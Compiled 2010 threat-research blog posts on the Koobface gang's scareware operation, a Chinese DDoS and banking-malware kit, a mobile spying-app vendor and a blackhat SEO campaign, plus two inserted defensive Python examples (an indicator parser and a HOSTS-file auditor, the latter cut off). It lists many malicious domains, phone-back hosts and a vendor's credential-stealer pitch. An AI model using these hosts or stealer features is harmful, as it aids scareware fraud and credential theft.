Read more on the practice - "[19]How the Koobface Gang Monetizes Mac OS X Traffic".

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07. [20]Ali Baba and 40 LLC a.k.a the Koobface gang greeted the security community on Christmas

- Koobface gang: it was 'ali baba & 4' originally you should be more careful

Since the original [21]Ali Baba had 40 thieves with him, not 4, the remaining 36 can be best described as the cybercrime ecosystem's stakeholders earning revenues and having their business models scaling, thanks to the involvement of the Koobface botnet.


08. [22]The Koobface gang once redirected Facebook's IP space to my personal blog

- Koobface gang: heh

Read more on the topic - "[23]Koobface Botnet Redirects Facebook's IP Space to my Blog".

09. [24]The gang is experimenting with alternative propagation strategies, such as for instance Skype

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- Koobface gang: strange error, there're no experiments on that

Hmm, who should I trust? [25]SophosLabs and [26]TrendMicro or the Koobface gang? SophosLabs and Trend Micro or the Koobface gang? SophosLabs and Trend Micro or....well you get the point. Of course there aren't any, now that it's publicly known it's in the works.

10. [27]The gang is monetizing traffic through the Crusade Affiliates scareware network

- Koobface gang: maybe, not 100 % sure

They don't know where they get all the money from by pushing scareware? How convenient.

When data and facts talk, even "CyberJesus" listens. Read more on the monetization model - "[28]Koobface Botnet's Scareware Business Model" and "[29]Koobface Botnet's Scareware Business Model - Part Two".


The Koobface botnet is currently pushing scareware through 2gig-antivirus.com?mid=312&code=4db12f&d=1&s=2 - 195.5.161.210 - Email: test@now.net.cn

Parked on the same IP (195.5.161.210, AS31252, STARNET-AS StarNet Moldova) are also:

0web-antispyware.com - Email: test@now.net.cn
12netantispy.com - Email: test@now.net.cn
13netantispy.com - Email: test@now.net.cn
14netantispy.com - Email: test@now.net.cn
16netantispy.com - Email: test@now.net.cn
1anetantispy.com - Email: test@now.net.cn
1bnetantispy.com - Email: test@now.net.cn
1gb-scanner.com - Email: test@now.net.cn
1gig-antivirus.com - Email: test@now.net.cn
1webantivirus.com - Email: test@now.net.cn
20gb-antivirus.com - Email: test@now.net.cn
2gb-scanner.com - Email: test@now.net.cn
2gig-antivirus.com - Email: test@now.net.cn
2mb-scanner.com - Email: test@now.net.cn
2web-antispy.com - Email: test@now.net.cn
2webantivirus.com - Email: test@now.net.cn
30gb-antivirus.com - Email: test@now.net.cn
3gb-scanner.com - Email: test@now.net.cn
3gig-antivirus.com - Email: test@now.net.cn
3mb-scanner.com - Email: test@now.net.cn
3web-antispy.com - Email: test@now.net.cn
3web-antispyware.com - Email: test@now.net.cn
3webantivirus.com - Email: test@now.net.cn
40gb-antivirus.com - Email: test@now.net.cn
4gb-scanner.com - Email: test@now.net.cn
4gig-antivirus.com - Email: test@now.net.cn
4mb-scanner.com - Email: test@now.net.cn
4web-antispy.com - Email: test@now.net.cn
4webantivirus.com - Email: test@now.net.cn
50gb-antivirus.com - Email: test@now.net.cn
5gb-scanner.com - Email: test@now.net.cn
5gig-antivirus.com - Email: test@now.net.cn
5mb-scanner.com - Email: test@now.net.cn
5web-antispy.com - Email: test@now.net.cn
5webantivirus.com - Email: test@now.net.cn
60gb-antivirus.com - Email: test@now.net.cn
6mb-scanner.com - Email: test@now.net.cn
6web-antispy.com - Email: test@now.net.cn
7web-antispyware.com - Email: test@now.net.cn
aweb-antispyware.com - Email: test@now.net.cn
awebantivirus.com - Email: test@now.net.cn
cwebantivirus.com - Email: test@now.net.cn
dwebantivirus.com - Email: test@now.net.cn
ewebantivirus.com - Email: test@now.net.cn
novascanner4.com - Email: test@now.net.cn

- setup.exe - [30]Gen:Variant.Koobface.2; W32.Koobface - Result: 15/40 (37.5 %)

- MalvRem_312s2.exe - [31]W32/FakeAlert.5!Maximus; Trojan.Win32.FakeAV - Result: 10/41 (24.4 %) which once executed phones back to:

- slsystem.com/download/winlogo.bmp - 91.213.157.104, AS13618, CARONET-AS - Email: contact@privacy-protect.cn

- networkilO.com - 91.213.217.106, AS42473, ANEXIA-AS - Email: contact@privacy-protect.cn

UPDATED: Wednesday, May 19, 2010:

The current redirection, taking place through the embedded link on Koobface infected hosts, goes through:

- www3.coantys-48td.xorg.pl - 188.124.5.66 - AS44565, VITAL TEKNOLOJI

- www1.fastsearch.cz.cc - 207.58.177.96 - AS25847, SERVINT ServInt Corporation

Detection rates:

- setup.exe - [32]Win32/Koobface.NCX; Gen:Variant.Koobface.2 - Result: 13/41 (31.71 %)

- packupdate_build107_2039.exe - [33]W32/FakeAV.AM!genr; Mal/FakeAV-AX - Result: 8/41 (19.52 %)

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Upon execution, the scareware sample phones back to:

update1.myownguardian.com - 94.228.209.223, AS47869, NETROUTING-AS - Email: gkook@checkjemail.nl

update2.myownguardian.net - 93.186.124.92, AS44565, VITAL TEKNOLOJI - Email: gkook@checkjemail.nl

UPDATED Monday, May 24, 2010:

The following Koobface scareware domains/redirectors have been pushed by the Koobface gang over the past 7 days. All of them continue using the services of AS31252, STARNET-AS StarNet Moldova at 195.5.161.210 and 195.5.161.211.

0web-antispyware.com - Email: test@now.net.cn
12netantispy.com - Email: test@now.net.cn
13netantispy.com - Email: test@now.net.cn
14netantispy.com - Email: test@now.net.cn
15netantispy.com - Email: test@now.net.cn
16netantispy.com - Email: test@now.net.cn
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1anetantispy.com - Email: test@now.net.cn
1bnetantispy.com - Email: test@now.net.cn
1cnetantispy.com - Email: test@now.net.cn
1dnetantispy.com - Email: test@now.net.cn
1eliminatemalware.com - Email: test@now.net.cn
1eliminatespy.com - Email: test@now.net.cn
1eliminatethreats.com - Email: test@now.net.cn
1eliminatevirus.com - Email: test@now.net.cn
1enetantispy.com - Email: test@now.net.cn
1webantivirus.com - Email: test@now.net.cn
1webfilter1000.com - Email: test@now.net.cn
1www-antispyware.com - Email: test@now.net.cn
1www-antivirus.com - Email: test@now.net.cn
20gb-antivirus.com - Email: test@now.net.cn
2eliminatemalware.com - Email: test@now.net.cn
2eliminatevirus.com - Email: test@now.net.cn
2web-antispy.com - Email: test@now.net.cn
2webantivirus.com - Email: test@now.net.cn
2www-antispyware.com - Email: test@now.net.cn
2www-antivirus.com - Email: test@now.net.cn
30gb-antivirus.com - Email: test@now.net.cn
3web-antispy.com - Email: test@now.net.cn
3web-antispyware.com - Email: test@now.net.cn
3webantivirus.com - Email: test@now.net.cn
3www-antispyware.com - Email: test@now.net.cn
3www-antivirus.com - Email: test@now.net.cn
40gb-antivirus.com - Email: test@now.net.cn
4web-antispy.com - Email: test@now.net.cn
4webantivirus.com - Email: test@now.net.cn
4www-antispyware.com - Email: test@now.net.cn
4www-antivirus.com - Email: test@now.net.cn
5web-antispy.com - Email: test@now.net.cn
5webantivirus.com - Email: test@now.net.cn
5www-antispyware.com - Email: test@now.net.cn
5www-antivirus.com - Email: test@now.net.cn
60gb-antivirus.com - Email: test@now.net.cn
6web-antispy.com - Email: test@now.net.cn
7web-antispyware.com - Email: test@now.net.cn
a30windows-scan.com - Email: test@now.net.cn
a40windows-scan.com - Email: test@now.net.cn
a50windows-scan.com - Email: test@now.net.cn
a60windows-scan.com - Email: test@now.net.cn
americanscanner.com - Email: test@now.net.cn
aresearchsecurity.com - Email: test@now.net.cn
awebantivirus.com - Email: test@now.net.cn
barracuda10.com - Email: test@now.net.cn
beguardsystem.com - Email: test@now.net.cn
beguardsystem2.com - Email: test@now.net.cn
bewareofthreat.com - Email: test@now.net.cn
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bewareofydanger.com - Email: test@now.net.cn
bprotectsystem.com - Email: test@now.net.cn
bwebantivirus.com - Email: test@now.net.cn
choclatescanner2.com - Email: test@now.net.cn
cleanerscanner2.com - Email: test@now.net.cn
cnn2scanner.com - Email: test@now.net.cn
cprotectsystem.com - Email: test@now.net.cn
cwebantivirus.com - Email: test@now.net.cn
dacota4security.com - Email: test@now.net.cn
defencyresearch.com - Email: test@now.net.cn
defenseacquisitions.com - Email: test@now.net.cn
defensecapability.com - Email: test@now.net.cn
dprotectsystem.com - Email: test@now.net.cn
dwebantivirus.com - Email: test@now.net.cn
eliminatespy.com - Email: test@now.net.cn
eliminatethreat.com - Email: test@now.net.cn
eliminatethreats.com - Email: test@now.net.cn
eprotectsystem.com - Email: test@now.net.cn
ewebantivirus.com - Email: test@now.net.cn
fantasticscan2.com - Email: test@now.net.cn
fortescanner.com - Email: test@now.net.cn
four4defence.com - Email: test@now.net.cn
fprotectsystem.com - Email: test@now.net.cn
house2call.com - Email: test@now.net.cn
house4call.com - Email: test@now.net.cn
ibewareofdanger.com - Email: test@now.net.cn
iresearchdefence.com - Email: test@now.net.cn
ldefenceresearch.com - Email: test@now.net.cn
micro2smart.com - Email: test@now.net.cn
micro4smart.com - Email: test@now.net.cn
micro6smart.com - Email: test@now.net.cn
necessitydefense.com - Email: test@now.net.cn
nolongerthreat.com - Email: test@now.net.cn
nova3-antispyware.com - Email: test@now.net.cn
nova4-antispyware.com - Email: test@now.net.cn
nova5-antispyware.com - Email: test@now.net.cn
nova7-antispyware.com - Email: test@now.net.cn
nova8-antispyware.com - Email: test@now.net.cn
nova-antivirus1.com - Email: test@now.net.cn
nova-antivirus2.com - Email: test@now.net.cn
novascanner2.com - Email: test@now.net.cn
nova-scanner2.com - Email: test@now.net.cn
novascanner3.com - Email: test@now.net.cn
nova-scanner3.com - Email: test@now.net.cn
novascanner4.com - Email: test@now.net.cn
nova-scanner4.com - Email: test@now.net.cn
novascanner5.com - Email: test@now.net.cn
nova-scanner5.com - Email: test@now.net.cn
novascanner7.com - Email: test@now.net.cn
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nova-scanner7.com - Email: test@now.net.cn
onguardsystem2.com - Email: test@now.net.cn
overllscanner.com - Email: test@now.net.cn
pcguardsystem2.com - Email: test@now.net.cn
pcguardsystems.com - Email: test@now.net.cn
pcpiscanner.com - Email: test@now.net.cn
pitstopscan.com - Email: test@now.net.cn
protectionfunctions.com - Email: test@now.net.cn
protectionmeasure.com - Email: test@now.net.cn
protectionmethods.com - Email: test@now.net.cn
protectionoffices.com - Email: test@now.net.cn
protectionprinciples.com - Email: test@now.net.cn
protectsystema.com - Email: test@now.net.cn
protectsystemc.com - Email: test@now.net.cn
protectsystemd.com - Email: test@now.net.cn
protectsysteme.com - Email: test@now.net.cn
protectsystemf.com - Email: test@now.net.cn
researchdefence.com - Email: test@now.net.cn
researchysecurity.com - Email: test@now.net.cn
spywarekillera.com - Email: test@now.net.cn
spywarekillerc.com - Email: test@now.net.cn
spywarekillerd.com - Email: test@now.net.cn
spywarekillere.com - Email: test@now.net.cn
spywarekillerr.com - Email: test@now.net.cn
spywarekillerz5.com - Email: test@now.net.cn
stainsscanner2.com - Email: test@now.net.cn
stop20attack.com - Email: test@now.net.cn
tendefender2.com - Email: test@now.net.cn
thelosers2010.com - Email: test@now.net.cn
trivalsoftware.com - Email: test@now.net.cn
unstoppable2010.com - Email: test@now.net.cn
use6defence.com - Email: test@now.net.cn
viruskiller3a.com - Email: test@now.net.cn
viruskiller4a.com - Email: test@now.net.cn
viruskiller5a.com - Email: test@now.net.cn
viruskiller6a.com - Email: test@now.net.cn
webfilter100.com - Email: test@now.net.cn
webfilter999.com - Email: test@now.net.cn
winguardsystem.com - Email: test@now.net.cn
yourguardsystem.com - Email: test@now.net.cn
yourguardsystem2.com - Email: test@now.net.cn
z22windows-scan.com - Email: test@now.net.cn
z23windows-scan.com - Email: test@now.net.cn
z25windows-scan.com - Email: test@now.net.cn
z27windows-scan.com - Email: test@now.net.cn
zaresearchsecurity.com - Email: test@now.net.cn

Detection rates:

- setup.exe - [34]Net-Worm:W32/Koobface.HN; Mal/Koobface-D - Result: 11/41 (26.83 %)

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- avdistr_312.exe - [35]Trojan.FakeAV!gen24; Trojan.FakeAV - Result: 8/41 (19.52 %)

Upon execution phones back to:

slsystem.com/download/winlogo.bmp - 91.213.157.104 - Email: contact@privacy-protect.cn

accsupdate.com/?b=103sl - 193.105.134.115 - Email: contact@privacy-protect.cn

Previously parked on 91.213.217.106, AS42473, ANEXIA-AS, now responding to 193.105.134.115, AS42708, PORTLANE:

networkilO.com - Email: contact@privacy-protect.cn

winsecuresoftorder.com - Email: contact@privacy-protect.cn

time-zoneserver.com - Email: contact@privacy-protect.cn

lblacklist.com - Email: contact@privacy-protect.cn
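The lists above are mostly useful as pivots: every domain line carries a registrant e-mail, the phone-back lines carry an IP and sometimes an ASN, and each sample line carries its multi-engine hit ratio. Below is an added example, not code from the post, that parses indicator lines in the format used throughout this post, groups hosts by registrant e-mail or by IP, and ranks samples by detection rate so the least-detected binary is the first one to write a signature for. The embedded sample text is constructed from a handful of lines in this post; the regular expressions and function names are this example's own.

```python
import re
from collections import defaultdict

# Indicator lines in the format the post uses. Constructed sample for this
# example: the values are a handful of entries copied from the lists above.
SAMPLE_IOC_TEXT = """\
0web-antispyware.com - Email: test@now.net.cn
12netantispy.com - Email: test@now.net.cn
update1.myownguardian.com - 94.228.209.223, AS47869, NETROUTING-AS - Email: gkook@checkjemail.nl
slsystem.com/download/winlogo.bmp - 91.213.157.104 - Email: contact@privacy-protect.cn
time-zoneserver.com - Email: contact@privacy-protect.cn
Detection rates:
- setup.exe - [34]Net-Worm:W32/Koobface.HN; Mal/Koobface-D - Result: 11/41 (26.83 %)
- avdistr_312.exe - [35]Trojan.FakeAV!gen24; Trojan.FakeAV - Result: 8/41 (19.52 %)
"""

# "domain[/path] [- IP[, ASN, AS name]] - Email: address"
DOMAIN_RE = re.compile(
    r"^(?P<domain>[a-z0-9][a-z0-9.-]*\.[a-z]{2,}(?:/\S*)?)"
    r"(?:\s+-\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
    r"(?:,\s*(?P<asn>AS\d+),\s*(?P<as_name>.+?))?)?"
    r"\s+-\s+Email:\s*(?P<email>\S+)\s*$",
    re.IGNORECASE,
)

# "- file - [n]AV name; AV name - Result: hits/total (pct %)"
DETECT_RE = re.compile(
    r"^-\s+(?P<file>\S+)\s+-\s+(?:\[\d+\])?(?P<names>.+?)"
    r"\s+-\s+Result:\s+(?P<hits>\d+)/(?P<total>\d+)"
)


def parse_ioc_lines(text):
    """Split indicator text into (domain records, sample records).

    Lines matching neither pattern (headings, blank lines) are ignored.
    """
    domains, samples = [], []
    for raw in text.splitlines():
        line = raw.strip()
        m = DOMAIN_RE.match(line)
        if m:
            rec = {k: v for k, v in m.groupdict().items() if v is not None}
            rec["host"] = rec["domain"].split("/", 1)[0].lower()
            domains.append(rec)
            continue
        m = DETECT_RE.match(line)
        if m:
            samples.append({
                "file": m["file"],
                "names": [n.strip() for n in m["names"].split(";")],
                "hits": int(m["hits"]),
                "total": int(m["total"]),
            })
    return domains, samples


def pivot(records, key="email", value="host"):
    """Group `value` fields by `key` (registrant e-mail by default, or IP).

    Records lacking the key are skipped; results are sorted for stable output.
    """
    groups = defaultdict(set)
    for rec in records:
        if key in rec:
            groups[rec[key].lower()].add(rec[value].lower())
    return {k: sorted(v) for k, v in groups.items()}


def detection_pct(sample):
    """Hit ratio as a percentage rounded to two places."""
    return round(100.0 * sample["hits"] / sample["total"], 2)


def rank_by_detection(samples):
    """Least-detected sample first: the one most worth a new signature."""
    return sorted(samples, key=detection_pct)


if __name__ == "__main__":
    domains, samples = parse_ioc_lines(SAMPLE_IOC_TEXT)
    for email, hosts in pivot(domains).items():
        print(f"{email}: {', '.join(hosts)}")
    for s in rank_by_detection(samples):
        print(f"{detection_pct(s):6.2f}%  {s['file']}  ({'; '.join(s['names'])})")
```

Feeding the full lists from this post through `parse_ioc_lines` and then `pivot` collapses several hundred lines to three registrant e-mails, which is exactly the observation the post makes by hand: the scareware domains share a registrant with each other and the phone-back hosts share another.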



In order to understand the importance of profiling the Koobface gang's activities, consider going through their underground multitasking campaigns in the related posts.

Related Koobface botnet/Koobface gang research:

[36] From the Koobface Gang with Scareware Serving Compromised Sites
[37] Dissecting Koobface Gang's Latest Facebook Spreading Campaign
[38] Koobface Redirectors and Scareware Campaigns Now Hosted in Moldova
[39] 10 things you didn't know about the Koobface gang
[40] A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang
[41] How the Koobface Gang Monetizes Mac OS X Traffic
[42] The Koobface Gang Wishes the Industry "Happy Holidays"
[43] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline
[44] Koobface Botnet Starts Serving Client-Side Exploits
[45] Massive Scareware Serving Blackhat SEO, the Koobface Gang Style
[46] Koobface Botnet's Scareware Business Model - Part Two
[47] Koobface Botnet's Scareware Business Model - Part One
[48] Koobface Botnet Redirects Facebook's IP Space to my Blog
[49] New Koobface campaign spoofs Adobe's Flash updater
[50] Social engineering tactics of the Koobface botnet
[51] Koobface Botnet Dissected in a Trend Micro Report
[52] Movement on the Koobface Front - Part Two
[53] Movement on the Koobface Front
[54] Koobface - Come Out, Come Out, Wherever You Are
[55] Dissecting Koobface Worm's Twitter Campaign

This post has been reproduced from [56]Dancho Danchev's blog. Follow him [57]on Twitter.
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Inside a Commercial Chinese DIY DDoS Tool (2010-05- 
26 13:55) 

One of the most commonly used tactics by shady online enterprises wanting to position themselves as legitimate ones ([1]Shark2 - RAT or Malware?) is to promote malicious software or Denial of Service attack tools as remote access control tools/stress testing tools.

Chinese "vendors" of such releases are particularly interesting, since their front pages always position the tool as a 100 % legitimate one, whereas going through the documentation, and actually testing its features, reveals its true malicious nature. Moreover, once the vendor starts trusting you - like the one whose DDoS tool is profiled in this post - you're given access to the private section of their forum, where they are directly pitching you with DDoS for hire propositions, starting from $100 for 24 hours of non-stop flood.

• Related post: [2]Massive SQL Injection Attacks - the Chinese Way

In this post I'll review what's currently being promoted as "The World's Leading DDoS Testing System", which is basically an improved version of the well known "Netbot Attacker", an old school release whose source code ([3]Localizing Open Source Malware; [4]Custom DDoS Capabilities Within a Malware; [5]Custom DDoS Attacks Within Popular Malware Diversifying) is greatly favored by Chinese hacktivists and script kiddies, based on the multiple modifications they've introduced in it using the original source code.

Interestingly, the "vendor" is offering value-added services in the form of managed command and control server changes, the typical managed binary obfuscation, as well as custom features and the removal of features in an attempt to decrease the size of the binary, but most importantly, they use differentiated pricing methods for their tool. Educational institutions, small businesses and home office clients can get special prices.

• Why would the vendor include anti-sandboxing capabilities in the latest version of the tool?

• Why would the vendor also include P2P spreading and USB spreading modules?

Because the tool is anything but your typical stress testing tool.

Perhaps one of the most important developments regarding this vendor is that this is among the few examples that I'm aware of where [6]Chinese hackers, known not to care about anything else but virtual goods, are vertically integrating by experimenting with early-stage banking malware.

An excerpt from the banking experiment:

"MS-recorder to wear all the safety test shows the major B2C online banking security controls. Received after the first test colt extracting file, which has ma.exe procedures. As the tests are over. Please turn off antivirus software and security software testing. . .

Wear all safety major B2C online banking security controls currently supports more than can be intercepted more than 160 online online payment platform And major online banking. After running ma.exe can log on to the respective online banking program All pay pay pal or procedures to test, test and test interception of information stored in the pony

The same directory, Test will generate J!z-1, J!z-2, Jlz-3 ... folder, such files in the folder will be 1.bmp, 2.bmp, 3.bmp ... picture, or there txt Notepad, view the .txt and picture, get the interception of data and information. Test window will prompt pony run, test interception of information larger, there is no written function. To solve the above problem, please purchase the official version, run silent, run automatically delete itself, no process at startup, had all killed, the interception of information

Expected small size, with letters function. VIP version of the generator purchase one year of free updates, free to kill three months to buy the colt package. Set the FTP transmission method to send the interception of STMP FTP.

Perfect information theft can steal all the passwords and related information, such as: QQ, ICQ, Yahoo Messenger, Vicq, Out Look, FlashFXP, PayPal, E-mail and pay pal (no security control), Legend, mercenary legend, Journey to the West, etc. (include account number, area and other relevant information), of course, the same information on the page steal, such as: mail, forums, close protection, and other (including user name, password and other related information), or even playing in the diagram, Password chip can, because it can record the keyboard and mouse actions. It is worth mentioning that, no matter what way you enter the password (such as Paste from somewhere, then paste the part of the input part, the number before the 0, deliberately enter the wrong password first and then delete the wrong part, etc.) Adopted the "filters" which makes stealing the contents do not appear out of "junk" in precise steal... The correct password."

Clearly, these folks are not just inspired to continue introducing new features within the tool, but are starting to realize the potential of the crimeware market, with the vendor itself representing a good example of how, once it was allowed to continue operations, it naturally evolved in the worst possible direction. The author of ZeuS, however, shouldn't feel endangered in any way.



Screenshots of the DIY DDoS Platform, including the 
multiple versions offers, VIP, sample custom made 
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Detection rates for the publicly obtainable builders of multiple versions:

- MS.exe - [7]Backdoor.Hupigon.AAAH - Result: 26/40 (65 %)

- msn.exe - [8]Win32.BDSPoison.Cpd - Result: 36/41 (87.81 %)

- test.exe (crimeware experiment) - [9]Hacktool.Rootkit - Result: 24/41 (58.54 %)

- msl.exe - [10]Backdoor.Win32.BlackHole - Result: 13/41 (31.71 %)

- msl.exe - [11]W32/Hupigon.gen227; Backdoor.Hupigon.AAAH - Result: 35/41 (85.37 %)

Based on profiling the localization of this tool to Chinese since 2007, and the diversification of the DDoS attacks introduced in it by Chinese coders ([12]Localizing Open Source Malware; [13]Custom DDoS Capabilities Within a Malware; [14]Custom DDoS Attacks Within Popular Malware Diversifying), perhaps the most important conclusion that can be drawn is that tolerating their activities in the long term results in the development of more sophisticated capabilities which can now be offered to a well established customer base.

If Chinese hacktivists managed to take CNN.com offline ([15]The DDoS Attack Against CNN.com; [16]Chinese Hacktivists Waging People's Information Warfare Against CNN) using nothing else but ping flooders/iFrames loading multiple copies of the site, the collectivist response in a future incident using these much more sophisticated tools - sophisticated in the sense of the diverse set of DDoS attacks offered - is prone to be much more effective.

Related Chinese hacking scene/hacktivism coverage: 

[17] Localizing Open Source Malware
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[18] Custom DDoS Capabilities Within a Malware
[19] Custom DDoS Attacks Within Popular Malware Diversifying
[20] The Fire Pack Exploitation Kit Localized to Chinese
[21] MPack and IcePack Localized to Chinese
[22] Massive SQL Injection Attacks - the Chinese Way
[23] A Chinese DIY Multi-Feature Malware
[24] DIY Chinese Passwords Stealer
[25] A Chinese Malware Downloader in the Wild
[26] Chinese Hackers Attacking U.S Department of Defense Networks
[27] Chinese Hacktivists Waging People's Information Warfare Against CNN
[28] The DDoS Attack Against CNN.com
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Spamvertised Client-Side Exploits Serving Adult Content Themed Campaign (2010-05-28 15:29)

There's no such thing as free porn, unless there are client-side exploits in the unique value proposition's mix.

A currently spamvertised campaign is doing exactly the same, in between relying on the recent [1]CVE-2010-0886 vulnerability. Let's dissect the campaign, and combine the assessment with historical OSINT data, given the fact that the 2nd phone back location, including the binary hosted there, is currently down.

• Key summary point: although the exploitation is taking place, the campaign is currently failing to drop the actual binary, returning a NOEXEFILE error message. The post will be updated once the situation changes.

This post has been reproduced from [2]Dancho Danchev's blog. Follow him [3]on Twitter.
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Summarizing Zero Day's Posts for May (2010-05-31 18:40)

The following is a brief summary of all of my posts at [1]ZDNet's Zero Day for May, 2010. You [2]can also go through [3]previous summaries, as well as subscribe to my [4]personal RSS feed, [5]Zero Day's main feed, or follow me on Twitter:

Recommended reading:

• [6]Should a targeted country strike back at the cyber attackers?

• [7]Hotmail's new security features vs Gmail's old security features

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• [8]Study finds the average price for renting a botnet

• [9]5 reasons why the proposed ID scheme for Internet users is a bad idea

01. [10]Foxit Reader intros new Safe Reading feature

02. [11]Should a targeted country strike back at the cyber attackers?

03. [12]Malware Watch: iTunes gift certificates, Skype worm, fake CVs and greeting cards

04. [13]Wardriving police: password protect your wireless, or face a fine

05. [14]Research: 1.3 million malicious ads viewed daily

06. [15]Malware Watch: Rogue Facebook apps, fake Amazon orders, and bogus Adobe updates

07. [16]Hotmail's new security features vs Gmail's old security features

08. [17]Study finds the average price for renting a botnet

09. [18]5 reasons why the proposed ID scheme for Internet users is a bad idea
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Vendor of Mobile Spying Apps Drives Biz Model Through DIY Generators (2010-06-03 15:09)

It's always worth monitoring the developments in the commercial mobile spying apps space. In particular, the inevitable customerization/customization of their services.

A shady vendor of such applications is attempting to migrate from the mass market model of competing vendors, by offering its potential customers the ability to generate their own .sis files for the spying app targeting the Symbian OS 9 platform. The DIY features also include [1]the ability to self-sign their own certificates. The price tag?

A hefty price tag of £3000, and no refunds offered.

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What's their true motivation behind the release of the DIY generation tool? It appears that they are primarily interested in scaling their business operations, allowing potential resellers the option to automatically generate the spying apps. Although the self-signing certificate option is interesting, mobile [2]malware authors continue abusing Symbian Foundation's certificate signing process, surprisingly, by using bogus company names with no public reference of their existence.

Thanks to the improving monetization models for mobile malware (e.g. calling/SMSing premium rate numbers), mobile malware authors are only starting to realize/abuse the potential of the micro payments market segment.
Related posts on mobile malware:

[3] The future of mobile malware - digitally signed by Symbian?
[4] Commercial spying app for Android devices released
[5] iHacked: jailbroken iPhones compromised, $5 ransom demanded
[6] New Symbian-based mobile worm circulating in the wild
[7] New mobile malware silently transfers account credit
[8] Transmitter.C mobile malware spreading in the wild
[9] Transmitter.C Mobile Malware in the Wild
[10] Proof of Concept Symbian Malware Courtesy of the Academic World
[11] Commercializing Mobile Malware
[12] Mobile Malware Scam iSexPlayer Wants Your Money

Related posts on SMS Ransomware:

[13] New ransomware locks PCs, demands premium SMS for removal
[14] Mac OS X SMS ransomware - hype or real threat?
[15] SMS Ransomware Displays Persistent Inline Ads
[16] 6th SMS Ransomware Variant Offered for Sale
[17] 5th SMS Ransomware Variant Offered for Sale
[18] 4th SMS Ransomware Variant Offered for Sale
[19] 3rd SMS Ransomware Variant Offered for Sale
[20] SMS Ransomware Source Code Now Offered for Sale
Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign - Part Two (2010-06-03 18:56)

UPDATED: Sunday, June 06, 2010.

The new redirections currently take place through www4.greatav40-td.co.cc/?uid=213&pid=3&ttl=51545746f5c (93.190.141.40) and www1.avscaner-40pr.co.cc (217.23.5.52).

Parked on 93.190.141.40, AS49981, WorldStream are also:

Detection rate:

- packupdate107_213.exe - [1]Trojan.Fakealert.origin; Mal/FakeAV-BW - Result: 12/41 (29.27 %)
Upon execution, the sample phones back to:

Parked on 95.169.186.25 (AS31103, KEYWEB-AS); 188.124.5.64 (AS44565, VITAL TEKNOLOJI) are also:

Remember the massive blackhat SEO campaign using U.S Federal Forms themed keywords, which was extensively profiled in August, 2009?

• [2]Blackhat SEO Campaign Hijacks U.S Federal Form Keywords, Serves Scareware

• [3]U.S Federal Forms Blackhat SEO Themed Scareware Campaign Expanding

• [4]Dissecting the Ongoing U.S Federal Forms Themed Blackhat SEO Campaign

• [5]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline - multiple connections

The cybercriminals behind it never really stopped feeding new domains, including compromised ones, naturally diversifying the set of topics in order to serve scareware. Now that enough data is gathered, naturally exposing connections within the cybercrime ecosystem which would be communicated using the "perfect timing, perfect channel" philosophy, it's time to dissect the online campaign, expose the entire portfolio of domains involved, and, of course, take it down.

What's particularly interesting about this gang is their clear understanding of QA (quality assurance) for the sake of increased OPSEC (operational security).

Just like the previous campaigns, each individual domain involved in the campaign is registered using a separate email, in the majority of cases an automatically registered one.

With or without the QA, there's no escape from the monetization vector - in this case, and like many others - scareware.

Domains used in the blackhat SEO campaign, none of these 
are currently flagged as harmful: 

The .co.cc domains portfolio responds to the following IPs; parked on them are also related malicious domains:

Compromised sites part of the blackhat SEO campaign:

Once the end user clicks on a link found within Google's index, a tiny .js checks the referrer (compromised_site.nl/directory/randomcontent.js) and the redirection takes place. For instance:

- www3.donrart58-td.co.cc/?uid=213&pid=3&ttl=21f4e73673b - 93.190.141.41 - Email: mailwork.abc@gmail.com

- www2.uberguardzz6.com - 94.228.220.114 - Email: gkook@checkjemail.nl

- www1.favoritav31-pd.co.cc - 188.124.5.66 - Email: mailwork.abc@gmail.com

- www2.avcleaner44-pd.co.cc - 93.190.139.214 - Email: mailwork.abc@gmail.com

Where do we know [6]the same campaigner (?uid=213&pid=3&ttl=21f4e73673b) from? From [7]related campaigns.
Parked on 93.190.141.41, donrart58-td.co.cc, AS49981 WorldStream are also:


Parked on 188.124.5.66, favoritav31-pd.co.cc, AS44565 VITAL TEKNOLOJI are also:

Parked on 95.169.186.25, AS31103, KEYWEB-AS are also:

Detection rate:

- packupdate107_213.exe - [8]TROJ_FRAUD.SMAF; Mal/FakeAV-AX - Result: 28/40 (70 %)

Phones back to:

74.82.216.3/ncr - [9]interesting HOSTS file modification 

What's so interesting about it anyway? The exact same modification was seen in "[10]Koobface Botnet's Scareware Business Model - Part Two", in regard to the Google IP 74.125.45.100.

Take down actions are already taking place; updates will be posted as soon as new developments emerge.
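A defender-side audit for the HOSTS-file tampering described above, written here as an added example rather than code from the post: it parses a HOSTS file, flags the search-engine and reputation hostnames the post's O1 entries showed being redirected whenever they point at a non-local address, and separately flags any non-local IP that absorbs several names. The sample HOSTS content is constructed; only the two public IPs in it are the ones the post names.

```python
"""Audit a HOSTS file for the kind of tampering described above.

Added example, not code from the post. Two signals: (1) a search or
reputation hostname (google.*, bing.com, search.yahoo.com,
safebrowsing-cache.google.com, urs.microsoft.com) mapped to a non-local
address, and (2) fan-in, one non-local IP absorbing several hostnames,
which also catches attacker-owned payment domains no watch list knows.
"""
import ipaddress
import re
from collections import defaultdict, namedtuple

Finding = namedtuple("Finding", "line ip host malformed")

# Hostnames a clean HOSTS file has no business resolving to a public IP.
WATCHED = [
    re.compile(r"^(www\.)?google(-analytics)?\.[a-z]{2,3}(\.[a-z]{2})?$"),
    re.compile(r"^safebrowsing-cache\.google\.com$"),
    re.compile(r"^(www\.)?bing\.com$"),
    re.compile(r"^((www|[a-z]{2})\.)?search\.yahoo\.com$"),
    re.compile(r"^urs\.microsoft\.com$"),
]


def is_watched(host):
    """True if host is one of the search/reputation names we protect."""
    return any(p.match(host) for p in WATCHED)


def parse_hosts(text):
    """Return [(line_no, ip_or_None, [hostnames])] for each mapping line.

    Comments and blank lines are skipped; an address that does not parse
    is kept as None so an odd entry still surfaces instead of vanishing.
    """
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            ip = None
        entries.append((n, ip, fields[1:]))
    return entries


def _is_local(ip):
    # 127.0.0.0/8, ::1 and 0.0.0.0 are how legitimate blocklists sinkhole.
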